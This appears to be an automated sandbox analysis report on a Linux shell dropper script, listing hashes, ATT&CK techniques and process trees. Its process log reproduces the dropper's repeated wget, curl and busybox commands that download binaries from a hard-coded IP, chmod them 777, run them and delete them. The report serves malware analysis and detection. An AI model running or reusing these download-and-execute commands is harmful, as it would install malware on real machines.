4f0193cfb3c04ad1fc306ae537eb414750a1e197ad2880628a783c605c82ae98

General

Target

4f0193cfb3c04ad1fc306ae537eb414750a1e197ad2880628a783c605c82ae98.sh
Size

10KB
MD5

27b63baf0856d3c378515930b79d4ee9
SHA1

b331346b5039e3311ce477fb474f8ba30244bc3c
SHA256

4f0193cfb3c04ad1fc306ae537eb414750a1e197ad2880628a783c605c82ae98
SHA512

b7d05d3e7e0e154d23a0ed956af3a3b2784cfb64df6080e64b3fa17429ff5eb2d3cdf3c4f27e296b13c7c3421948c336687155a8bf1f91a0d49cc9fac72b33a9
SSDEEP

96:sZfLT4VODqYcuijO+/5tjfLPh4DMpAXfG:sR4gDqYcXgC

Score

7^/10

antivm defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 24 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	process
872	chmod
760	chmod
816	chmod
852	chmod
858	chmod
810	chmod
828	chmod
834	chmod
846	chmod
678	chmod
749	chmod
782	chmod
804	chmod
896	chmod
884	chmod
686	chmod
707	chmod
729	chmod
878	chmod
890	chmod
798	chmod
822	chmod
840	chmod
864	chmod

Executes dropped EXE 24 IoCs

Processes:

LAFlE91ZTRl6L0xRNwGNWaLK0Nd0HhJc8d7j6jf7VSHinj3svXColG35DXP50gjiUCvod3qI0xH8l5VynwPmfsA4ChjMBXOBflWdz7kKQFg9TQhEfI9BJWkfLMJrfB23o7LwnkzvP1ujHa8aNLIvRtjgPlzhzB1PoGadVBS5rg7HfreiMCHJFcTn2D8aHmJ0eAInA46yP1kTkyXctIZOIax78d4uua2NVa4ynVFwSJAguxpdqTH4CquEljUTIPXTolnHhMbROjXTC898IVQLS8wGip2TSQNEXK1Y9eQRYCZX2xMl4TMOJXSV6I5yHJhMg44uLN82uhvyMSOoMZoKFOT5mdsokZpwykxJwzolt2cDi3PuxqmaeAXRCrBy0dEiDptNKuImqICEYUijJIyGTsLVjlYKG9KWWmNoQ1AtJK4RO5dcioD3Jr3p5JxhSbYpRtCqt3sTbmrBivJBTm5NvqrcjMv5xhSbYpRtCqt3sTbmrBivJBTm5NvqrcjMv5kKQFg9TQhEfI9BJWkfLMJrfB23o7LwnkzvP1ujHa8aNLIvRtjgPlzhzB1PoGadVBS5rg7HfreiMCHJFcTn2D8aHmJ0eAInA46yP1kTLAFlE91ZTRl6L0xRNwGNWaLK0Nd0HhJc8d7j6jf7VSHinj3svXColG35DXP50gjiUCvod3qI0xH8l5VynwPmfsA4ChjMBXOBflWdz7IVQLS8wGip2TSQNEXK1Y9eQRYCZX2xMl4TMOJXSV6I5yHJhMg44uLN82uhvyMSOoMZoKFOT5mdsokZpwykxJwzolt2cDi3PuxqmaeA

Checks CPU configuration 1 TTPs 24 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 48 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl

System Network Configuration Discovery 1 TTPs 15 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

Processes:

rmcurlwgetcurlcurlbusyboxpdqTH4CquEljUTIPXTolnHhMbROjXTC898wgetIVQLS8wGip2TSQNEXK1Y9eQRYCZX2xMl4TrmIVQLS8wGip2TSQNEXK1Y9eQRYCZX2xMl4Trmwgetbusyboxbusybox

pid	process
800	rm
802	curl
881	wget
882	curl
792	curl
803	busybox
799	pdqTH4CquEljUTIPXTolnHhMbROjXTC898
801	wget
805	IVQLS8wGip2TSQNEXK1Y9eQRYCZX2xMl4T
806	rm
885	IVQLS8wGip2TSQNEXK1Y9eQRYCZX2xMl4T
886	rm
786	wget
883	busybox
797	busybox

Writes file to tmp directory 24 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/kKQFg9TQhEfI9BJWkfLMJrfB23o7Lwnkzv	curl
File opened for modification	/tmp/jlYKG9KWWmNoQ1AtJK4RO5dcioD3Jr3p5J	curl
File opened for modification	/tmp/xhSbYpRtCqt3sTbmrBivJBTm5NvqrcjMv5	curl
File opened for modification	/tmp/P1ujHa8aNLIvRtjgPlzhzB1PoGadVBS5rg	curl
File opened for modification	/tmp/LAFlE91ZTRl6L0xRNwGNWaLK0Nd0HhJc8d	curl
File opened for modification	/tmp/MOJXSV6I5yHJhMg44uLN82uhvyMSOoMZoK	curl
File opened for modification	/tmp/LAFlE91ZTRl6L0xRNwGNWaLK0Nd0HhJc8d	curl
File opened for modification	/tmp/P1ujHa8aNLIvRtjgPlzhzB1PoGadVBS5rg	curl
File opened for modification	/tmp/7HfreiMCHJFcTn2D8aHmJ0eAInA46yP1kT	curl
File opened for modification	/tmp/kKQFg9TQhEfI9BJWkfLMJrfB23o7Lwnkzv	curl
File opened for modification	/tmp/7HfreiMCHJFcTn2D8aHmJ0eAInA46yP1kT	curl
File opened for modification	/tmp/d3qI0xH8l5VynwPmfsA4ChjMBXOBflWdz7	curl
File opened for modification	/tmp/IVQLS8wGip2TSQNEXK1Y9eQRYCZX2xMl4T	curl
File opened for modification	/tmp/FOT5mdsokZpwykxJwzolt2cDi3PuxqmaeA	curl
File opened for modification	/tmp/d3qI0xH8l5VynwPmfsA4ChjMBXOBflWdz7	curl
File opened for modification	/tmp/IVQLS8wGip2TSQNEXK1Y9eQRYCZX2xMl4T	curl
File opened for modification	/tmp/xhSbYpRtCqt3sTbmrBivJBTm5NvqrcjMv5	curl
File opened for modification	/tmp/7j6jf7VSHinj3svXColG35DXP50gjiUCvo	curl
File opened for modification	/tmp/7j6jf7VSHinj3svXColG35DXP50gjiUCvo	curl
File opened for modification	/tmp/kyXctIZOIax78d4uua2NVa4ynVFwSJAgux	curl
File opened for modification	/tmp/pdqTH4CquEljUTIPXTolnHhMbROjXTC898	curl
File opened for modification	/tmp/MOJXSV6I5yHJhMg44uLN82uhvyMSOoMZoK	curl
File opened for modification	/tmp/FOT5mdsokZpwykxJwzolt2cDi3PuxqmaeA	curl
File opened for modification	/tmp/XRCrBy0dEiDptNKuImqICEYUijJIyGTsLV	curl

/tmp/4f0193cfb3c04ad1fc306ae537eb414750a1e197ad2880628a783c605c82ae98.sh
/tmp/4f0193cfb3c04ad1fc306ae537eb414750a1e197ad2880628a783c605c82ae98.sh
1⤵
PID:647

/bin/rm
/bin/rm bins.sh
2⤵
PID:649

/usr/bin/wget
wget http://87.120.84.230/bins/LAFlE91ZTRl6L0xRNwGNWaLK0Nd0HhJc8d
2⤵
PID:651

/usr/bin/curl
curl -O http://87.120.84.230/bins/LAFlE91ZTRl6L0xRNwGNWaLK0Nd0HhJc8d
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:666

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/LAFlE91ZTRl6L0xRNwGNWaLK0Nd0HhJc8d
2⤵
PID:675

/bin/chmod
chmod 777 LAFlE91ZTRl6L0xRNwGNWaLK0Nd0HhJc8d
2⤵
- File and Directory Permissions Modification
PID:678

/tmp/LAFlE91ZTRl6L0xRNwGNWaLK0Nd0HhJc8d
./LAFlE91ZTRl6L0xRNwGNWaLK0Nd0HhJc8d
2⤵
- Executes dropped EXE
PID:680

/bin/rm
rm LAFlE91ZTRl6L0xRNwGNWaLK0Nd0HhJc8d
2⤵
PID:681

/usr/bin/wget
wget http://87.120.84.230/bins/7j6jf7VSHinj3svXColG35DXP50gjiUCvo
2⤵
PID:682

/usr/bin/curl
curl -O http://87.120.84.230/bins/7j6jf7VSHinj3svXColG35DXP50gjiUCvo
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:683

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/7j6jf7VSHinj3svXColG35DXP50gjiUCvo
2⤵
PID:684

/bin/chmod
chmod 777 7j6jf7VSHinj3svXColG35DXP50gjiUCvo
2⤵
- File and Directory Permissions Modification
PID:686

/tmp/7j6jf7VSHinj3svXColG35DXP50gjiUCvo
./7j6jf7VSHinj3svXColG35DXP50gjiUCvo
2⤵
- Executes dropped EXE
PID:688

/bin/rm
rm 7j6jf7VSHinj3svXColG35DXP50gjiUCvo
2⤵
PID:689

/usr/bin/wget
wget http://87.120.84.230/bins/d3qI0xH8l5VynwPmfsA4ChjMBXOBflWdz7
2⤵
PID:690

/usr/bin/curl
curl -O http://87.120.84.230/bins/d3qI0xH8l5VynwPmfsA4ChjMBXOBflWdz7
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:696

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/d3qI0xH8l5VynwPmfsA4ChjMBXOBflWdz7
2⤵
PID:702

/bin/chmod
chmod 777 d3qI0xH8l5VynwPmfsA4ChjMBXOBflWdz7
2⤵
- File and Directory Permissions Modification
PID:707

/tmp/d3qI0xH8l5VynwPmfsA4ChjMBXOBflWdz7
./d3qI0xH8l5VynwPmfsA4ChjMBXOBflWdz7
2⤵
- Executes dropped EXE
PID:708

/bin/rm
rm d3qI0xH8l5VynwPmfsA4ChjMBXOBflWdz7
2⤵
PID:709

/usr/bin/wget
wget http://87.120.84.230/bins/kKQFg9TQhEfI9BJWkfLMJrfB23o7Lwnkzv
2⤵
PID:711

/usr/bin/curl
curl -O http://87.120.84.230/bins/kKQFg9TQhEfI9BJWkfLMJrfB23o7Lwnkzv
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:717

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/kKQFg9TQhEfI9BJWkfLMJrfB23o7Lwnkzv
2⤵
PID:723

/bin/chmod
chmod 777 kKQFg9TQhEfI9BJWkfLMJrfB23o7Lwnkzv
2⤵
- File and Directory Permissions Modification
PID:729

/tmp/kKQFg9TQhEfI9BJWkfLMJrfB23o7Lwnkzv
./kKQFg9TQhEfI9BJWkfLMJrfB23o7Lwnkzv
2⤵
- Executes dropped EXE
PID:730

/bin/rm
rm kKQFg9TQhEfI9BJWkfLMJrfB23o7Lwnkzv
2⤵
PID:731

/usr/bin/wget
wget http://87.120.84.230/bins/P1ujHa8aNLIvRtjgPlzhzB1PoGadVBS5rg
2⤵
PID:732

/usr/bin/curl
curl -O http://87.120.84.230/bins/P1ujHa8aNLIvRtjgPlzhzB1PoGadVBS5rg
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:740

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/P1ujHa8aNLIvRtjgPlzhzB1PoGadVBS5rg
2⤵
PID:746

/bin/chmod
chmod 777 P1ujHa8aNLIvRtjgPlzhzB1PoGadVBS5rg
2⤵
- File and Directory Permissions Modification
PID:749

/tmp/P1ujHa8aNLIvRtjgPlzhzB1PoGadVBS5rg
./P1ujHa8aNLIvRtjgPlzhzB1PoGadVBS5rg
2⤵
- Executes dropped EXE
PID:750

/bin/rm
rm P1ujHa8aNLIvRtjgPlzhzB1PoGadVBS5rg
2⤵
PID:752

/usr/bin/wget
wget http://87.120.84.230/bins/7HfreiMCHJFcTn2D8aHmJ0eAInA46yP1kT
2⤵
PID:753

/usr/bin/curl
curl -O http://87.120.84.230/bins/7HfreiMCHJFcTn2D8aHmJ0eAInA46yP1kT
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:754

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/7HfreiMCHJFcTn2D8aHmJ0eAInA46yP1kT
2⤵
PID:755

/bin/chmod
chmod 777 7HfreiMCHJFcTn2D8aHmJ0eAInA46yP1kT
2⤵
- File and Directory Permissions Modification
PID:760

/tmp/7HfreiMCHJFcTn2D8aHmJ0eAInA46yP1kT
./7HfreiMCHJFcTn2D8aHmJ0eAInA46yP1kT
2⤵
- Executes dropped EXE
PID:761

/bin/rm
rm 7HfreiMCHJFcTn2D8aHmJ0eAInA46yP1kT
2⤵
PID:763

/usr/bin/wget
wget http://87.120.84.230/bins/kyXctIZOIax78d4uua2NVa4ynVFwSJAgux
2⤵
PID:764

/usr/bin/curl
curl -O http://87.120.84.230/bins/kyXctIZOIax78d4uua2NVa4ynVFwSJAgux
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:770

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/kyXctIZOIax78d4uua2NVa4ynVFwSJAgux
2⤵
PID:777

/bin/chmod
chmod 777 kyXctIZOIax78d4uua2NVa4ynVFwSJAgux
2⤵
- File and Directory Permissions Modification
PID:782

/tmp/kyXctIZOIax78d4uua2NVa4ynVFwSJAgux
./kyXctIZOIax78d4uua2NVa4ynVFwSJAgux
2⤵
- Executes dropped EXE
PID:783

/bin/rm
rm kyXctIZOIax78d4uua2NVa4ynVFwSJAgux
2⤵
PID:785

/usr/bin/wget
wget http://87.120.84.230/bins/pdqTH4CquEljUTIPXTolnHhMbROjXTC898
2⤵
- System Network Configuration Discovery
PID:786

/usr/bin/curl
curl -O http://87.120.84.230/bins/pdqTH4CquEljUTIPXTolnHhMbROjXTC898
2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:792

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/pdqTH4CquEljUTIPXTolnHhMbROjXTC898
2⤵
- System Network Configuration Discovery
PID:797

/bin/chmod
chmod 777 pdqTH4CquEljUTIPXTolnHhMbROjXTC898
2⤵
- File and Directory Permissions Modification
PID:798

/tmp/pdqTH4CquEljUTIPXTolnHhMbROjXTC898
./pdqTH4CquEljUTIPXTolnHhMbROjXTC898
2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:799

/bin/rm
rm pdqTH4CquEljUTIPXTolnHhMbROjXTC898
2⤵
- System Network Configuration Discovery
PID:800

/usr/bin/wget
wget http://87.120.84.230/bins/IVQLS8wGip2TSQNEXK1Y9eQRYCZX2xMl4T
2⤵
- System Network Configuration Discovery
PID:801

/usr/bin/curl
curl -O http://87.120.84.230/bins/IVQLS8wGip2TSQNEXK1Y9eQRYCZX2xMl4T
2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:802

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/IVQLS8wGip2TSQNEXK1Y9eQRYCZX2xMl4T
2⤵
- System Network Configuration Discovery
PID:803

/bin/chmod
chmod 777 IVQLS8wGip2TSQNEXK1Y9eQRYCZX2xMl4T
2⤵
- File and Directory Permissions Modification
PID:804

/tmp/IVQLS8wGip2TSQNEXK1Y9eQRYCZX2xMl4T
./IVQLS8wGip2TSQNEXK1Y9eQRYCZX2xMl4T
2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:805

/bin/rm
rm IVQLS8wGip2TSQNEXK1Y9eQRYCZX2xMl4T
2⤵
- System Network Configuration Discovery
PID:806

/usr/bin/wget
wget http://87.120.84.230/bins/MOJXSV6I5yHJhMg44uLN82uhvyMSOoMZoK
2⤵
PID:807

/usr/bin/curl
curl -O http://87.120.84.230/bins/MOJXSV6I5yHJhMg44uLN82uhvyMSOoMZoK
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:808

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/MOJXSV6I5yHJhMg44uLN82uhvyMSOoMZoK
2⤵
PID:809

/bin/chmod
chmod 777 MOJXSV6I5yHJhMg44uLN82uhvyMSOoMZoK
2⤵
- File and Directory Permissions Modification
PID:810

/tmp/MOJXSV6I5yHJhMg44uLN82uhvyMSOoMZoK
./MOJXSV6I5yHJhMg44uLN82uhvyMSOoMZoK
2⤵
- Executes dropped EXE
PID:811

/bin/rm
rm MOJXSV6I5yHJhMg44uLN82uhvyMSOoMZoK
2⤵
PID:812

/usr/bin/wget
wget http://87.120.84.230/bins/FOT5mdsokZpwykxJwzolt2cDi3PuxqmaeA
2⤵
PID:813

/usr/bin/curl
curl -O http://87.120.84.230/bins/FOT5mdsokZpwykxJwzolt2cDi3PuxqmaeA
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:814

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/FOT5mdsokZpwykxJwzolt2cDi3PuxqmaeA
2⤵
PID:815

/bin/chmod
chmod 777 FOT5mdsokZpwykxJwzolt2cDi3PuxqmaeA
2⤵
- File and Directory Permissions Modification
PID:816

/tmp/FOT5mdsokZpwykxJwzolt2cDi3PuxqmaeA
./FOT5mdsokZpwykxJwzolt2cDi3PuxqmaeA
2⤵
- Executes dropped EXE
PID:817

/bin/rm
rm FOT5mdsokZpwykxJwzolt2cDi3PuxqmaeA
2⤵
PID:818

/usr/bin/wget
wget http://87.120.84.230/bins/XRCrBy0dEiDptNKuImqICEYUijJIyGTsLV
2⤵
PID:819

/usr/bin/curl
curl -O http://87.120.84.230/bins/XRCrBy0dEiDptNKuImqICEYUijJIyGTsLV
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:820

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/XRCrBy0dEiDptNKuImqICEYUijJIyGTsLV
2⤵
PID:821

/bin/chmod
chmod 777 XRCrBy0dEiDptNKuImqICEYUijJIyGTsLV
2⤵
- File and Directory Permissions Modification
PID:822

/tmp/XRCrBy0dEiDptNKuImqICEYUijJIyGTsLV
./XRCrBy0dEiDptNKuImqICEYUijJIyGTsLV
2⤵
- Executes dropped EXE
PID:823

/bin/rm
rm XRCrBy0dEiDptNKuImqICEYUijJIyGTsLV
2⤵
PID:824

/usr/bin/wget
wget http://87.120.84.230/bins/jlYKG9KWWmNoQ1AtJK4RO5dcioD3Jr3p5J
2⤵
PID:825

/usr/bin/curl
curl -O http://87.120.84.230/bins/jlYKG9KWWmNoQ1AtJK4RO5dcioD3Jr3p5J
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:826

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/jlYKG9KWWmNoQ1AtJK4RO5dcioD3Jr3p5J
2⤵
PID:827

/bin/chmod
chmod 777 jlYKG9KWWmNoQ1AtJK4RO5dcioD3Jr3p5J
2⤵
- File and Directory Permissions Modification
PID:828

/tmp/jlYKG9KWWmNoQ1AtJK4RO5dcioD3Jr3p5J
./jlYKG9KWWmNoQ1AtJK4RO5dcioD3Jr3p5J
2⤵
- Executes dropped EXE
PID:829

/bin/rm
rm jlYKG9KWWmNoQ1AtJK4RO5dcioD3Jr3p5J
2⤵
PID:830

/usr/bin/wget
wget http://87.120.84.230/bins/xhSbYpRtCqt3sTbmrBivJBTm5NvqrcjMv5
2⤵
PID:831

/usr/bin/curl
curl -O http://87.120.84.230/bins/xhSbYpRtCqt3sTbmrBivJBTm5NvqrcjMv5
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:832

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/xhSbYpRtCqt3sTbmrBivJBTm5NvqrcjMv5
2⤵
PID:833

/bin/chmod
chmod 777 xhSbYpRtCqt3sTbmrBivJBTm5NvqrcjMv5
2⤵
- File and Directory Permissions Modification
PID:834

/tmp/xhSbYpRtCqt3sTbmrBivJBTm5NvqrcjMv5
./xhSbYpRtCqt3sTbmrBivJBTm5NvqrcjMv5
2⤵
- Executes dropped EXE
PID:835

/bin/rm
rm xhSbYpRtCqt3sTbmrBivJBTm5NvqrcjMv5
2⤵
PID:836

/usr/bin/wget
wget http://87.120.84.230/bins/xhSbYpRtCqt3sTbmrBivJBTm5NvqrcjMv5
2⤵
PID:837

/usr/bin/curl
curl -O http://87.120.84.230/bins/xhSbYpRtCqt3sTbmrBivJBTm5NvqrcjMv5
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:838

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/xhSbYpRtCqt3sTbmrBivJBTm5NvqrcjMv5
2⤵
PID:839

/bin/chmod
chmod 777 xhSbYpRtCqt3sTbmrBivJBTm5NvqrcjMv5
2⤵
- File and Directory Permissions Modification
PID:840

/tmp/xhSbYpRtCqt3sTbmrBivJBTm5NvqrcjMv5
./xhSbYpRtCqt3sTbmrBivJBTm5NvqrcjMv5
2⤵
- Executes dropped EXE
PID:841

/bin/rm
rm xhSbYpRtCqt3sTbmrBivJBTm5NvqrcjMv5
2⤵
PID:842

/usr/bin/wget
wget http://87.120.84.230/bins/kKQFg9TQhEfI9BJWkfLMJrfB23o7Lwnkzv
2⤵
PID:843

/usr/bin/curl
curl -O http://87.120.84.230/bins/kKQFg9TQhEfI9BJWkfLMJrfB23o7Lwnkzv
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:844

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/kKQFg9TQhEfI9BJWkfLMJrfB23o7Lwnkzv
2⤵
PID:845

/bin/chmod
chmod 777 kKQFg9TQhEfI9BJWkfLMJrfB23o7Lwnkzv
2⤵
- File and Directory Permissions Modification
PID:846

/tmp/kKQFg9TQhEfI9BJWkfLMJrfB23o7Lwnkzv
./kKQFg9TQhEfI9BJWkfLMJrfB23o7Lwnkzv
2⤵
- Executes dropped EXE
PID:847

/bin/rm
rm kKQFg9TQhEfI9BJWkfLMJrfB23o7Lwnkzv
2⤵
PID:848

/usr/bin/wget
wget http://87.120.84.230/bins/P1ujHa8aNLIvRtjgPlzhzB1PoGadVBS5rg
2⤵
PID:849

/usr/bin/curl
curl -O http://87.120.84.230/bins/P1ujHa8aNLIvRtjgPlzhzB1PoGadVBS5rg
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:850

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/P1ujHa8aNLIvRtjgPlzhzB1PoGadVBS5rg
2⤵
PID:851

/bin/chmod
chmod 777 P1ujHa8aNLIvRtjgPlzhzB1PoGadVBS5rg
2⤵
- File and Directory Permissions Modification
PID:852

/tmp/P1ujHa8aNLIvRtjgPlzhzB1PoGadVBS5rg
./P1ujHa8aNLIvRtjgPlzhzB1PoGadVBS5rg
2⤵
- Executes dropped EXE
PID:853

/bin/rm
rm P1ujHa8aNLIvRtjgPlzhzB1PoGadVBS5rg
2⤵
PID:854

/usr/bin/wget
wget http://87.120.84.230/bins/7HfreiMCHJFcTn2D8aHmJ0eAInA46yP1kT
2⤵
PID:855

/usr/bin/curl
curl -O http://87.120.84.230/bins/7HfreiMCHJFcTn2D8aHmJ0eAInA46yP1kT
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:856

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/7HfreiMCHJFcTn2D8aHmJ0eAInA46yP1kT
2⤵
PID:857

/bin/chmod
chmod 777 7HfreiMCHJFcTn2D8aHmJ0eAInA46yP1kT
2⤵
- File and Directory Permissions Modification
PID:858

/tmp/7HfreiMCHJFcTn2D8aHmJ0eAInA46yP1kT
./7HfreiMCHJFcTn2D8aHmJ0eAInA46yP1kT
2⤵
- Executes dropped EXE
PID:859

/bin/rm
rm 7HfreiMCHJFcTn2D8aHmJ0eAInA46yP1kT
2⤵
PID:860

/usr/bin/wget
wget http://87.120.84.230/bins/LAFlE91ZTRl6L0xRNwGNWaLK0Nd0HhJc8d
2⤵
PID:861

/usr/bin/curl
curl -O http://87.120.84.230/bins/LAFlE91ZTRl6L0xRNwGNWaLK0Nd0HhJc8d
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:862

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/LAFlE91ZTRl6L0xRNwGNWaLK0Nd0HhJc8d
2⤵
PID:863

/bin/chmod
chmod 777 LAFlE91ZTRl6L0xRNwGNWaLK0Nd0HhJc8d
2⤵
- File and Directory Permissions Modification
PID:864

/tmp/LAFlE91ZTRl6L0xRNwGNWaLK0Nd0HhJc8d
./LAFlE91ZTRl6L0xRNwGNWaLK0Nd0HhJc8d
2⤵
- Executes dropped EXE
PID:865

/bin/rm
rm LAFlE91ZTRl6L0xRNwGNWaLK0Nd0HhJc8d
2⤵
PID:866

/usr/bin/wget
wget http://87.120.84.230/bins/7j6jf7VSHinj3svXColG35DXP50gjiUCvo
2⤵
PID:867

/usr/bin/curl
curl -O http://87.120.84.230/bins/7j6jf7VSHinj3svXColG35DXP50gjiUCvo
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:869

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/7j6jf7VSHinj3svXColG35DXP50gjiUCvo
2⤵
PID:871

/bin/chmod
chmod 777 7j6jf7VSHinj3svXColG35DXP50gjiUCvo
2⤵
- File and Directory Permissions Modification
PID:872

/tmp/7j6jf7VSHinj3svXColG35DXP50gjiUCvo
./7j6jf7VSHinj3svXColG35DXP50gjiUCvo
2⤵
- Executes dropped EXE
PID:873

/bin/rm
rm 7j6jf7VSHinj3svXColG35DXP50gjiUCvo
2⤵
PID:874

/usr/bin/wget
wget http://87.120.84.230/bins/d3qI0xH8l5VynwPmfsA4ChjMBXOBflWdz7
2⤵
PID:875

/usr/bin/curl
curl -O http://87.120.84.230/bins/d3qI0xH8l5VynwPmfsA4ChjMBXOBflWdz7
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:876

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/d3qI0xH8l5VynwPmfsA4ChjMBXOBflWdz7
2⤵
PID:877

/bin/chmod
chmod 777 d3qI0xH8l5VynwPmfsA4ChjMBXOBflWdz7
2⤵
- File and Directory Permissions Modification
PID:878

/tmp/d3qI0xH8l5VynwPmfsA4ChjMBXOBflWdz7
./d3qI0xH8l5VynwPmfsA4ChjMBXOBflWdz7
2⤵
- Executes dropped EXE
PID:879

/bin/rm
rm d3qI0xH8l5VynwPmfsA4ChjMBXOBflWdz7
2⤵
